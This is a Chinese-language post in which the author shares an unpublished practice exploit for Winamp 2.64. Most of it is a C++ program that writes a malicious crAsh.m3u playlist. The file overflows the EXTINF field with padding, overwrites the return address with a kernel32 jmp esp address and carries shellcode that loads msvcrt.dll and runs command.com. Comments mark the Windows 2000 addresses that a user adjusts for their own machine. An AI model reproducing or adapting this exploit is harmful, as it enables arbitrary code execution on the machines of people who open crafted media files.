这是我以前练手写的winamp的一个exploit,没有发表过。
现在大概没有人还在用winamp 2.64了，只能做参考用了。

我的机子windows 2000 professional 5.00.2195 sp1
msvcrt.dll start 0x78000000
system 0x7801aaad
messagebox 0x77e0737e
loadlibrary 0x77e67273
ff,e4(jmp esp) 我找的是kernel32中的0x77e6898b
注上//sztcww的是需要你自己根据你的情况调整的 

参考《ipxodi写的堆栈溢出系列讲座》
    《一篇bugtraq关于winamp 6.4的讨论》
  
// winamp2.64 exploit.cpp : Defines the entry point for the console applicat 
ion. 
// 
/*winamp2.64 buffer overflow exploit 
 * u can get a lovely dos window 
 * if u can ,run arbitrary code 
 *thank icefire 
 */ 
#include "stdafx.h" 
int main(int argc, char* argv[]) 
{ 
  
char buffer[500]; 
char eip[8] = "\x8b\x89\xe6\x77"; //sztcww  kernel32 jmp esp 
char sploit[] = 
"\x55\x8B\xEC\x33\xC0" 
"\x50" 
"\x50" 
"\x50" 
"\xC6\x45\xF4\x4D" 
"\xC6\x45\xF5\x53" 
"\xC6\x45\xF6\x56" 
"\xC6\x45\xF7\x43" 
"\xC6\x45\xF8\x52" 
"\xC6\x45\xF9\x54" 
"\xC6\x45\xFA\x2E" 
"\xC6\x45\xFB\x44" 
"\xC6\x45\xFC\x4C" 
"\xC6\x45\xFD\x4C" 
"\xBA\x73\x72\xe6\x77"//sztcww  my pc loadlibrary add is 0x77e67273 
"\x52" 
"\x8D\x45\xF4" 
"\x50" 
"\xFF\x55\xF0" 
//open dos 
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2 
E" 
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF 
4" 
"\x50" 
"\xB8\xad\xaa\x01\x78"//sztcww system in my pc is 0x7801aaad 
"\xFF\xD0" 
//exit 
"\x55" 
"\x8B\xEC" 
"\xBA\xFF\xFF\xFF\xFF" 
"\x81\xEA" 
"\xFB\xAA\xFF\x87" 
"\x52\x33\xC0\x50\xFF\x55\xFC" 
; 
FILE *file; 
for(int x=0;x<269;x++) 
{ 
buffer[x] ='A'; 
} 
buffer[x] =0XA0; 
x++; 
buffer[x] =0xA1; 
x++; 
buffer[x] =0x11; 
x++; 
buffer[x] =0x11; 
x++; 
buffer[x] =0X50; 
x++; 
buffer[x] =0x50; 
x++; 
buffer[x] =0x50; 
x++; 
buffer[x] =0x50; 
x++; 
buffer[x]=0; 
file = fopen("crAsh.m3u","wb"); 
fprintf(file, "#EXTM3U\n");//here 
fprintf(file, "#EXTINF:");//here 
fprintf(file, "%s", buffer); 
fprintf(file, "%s", eip); 
fprintf(file, "%s\n\n\n", sploit); 
fclose(file); 
printf("\t created file crAsh.m3u loaded with the exploit.\n"); 
return 0; 
} 
  
  

--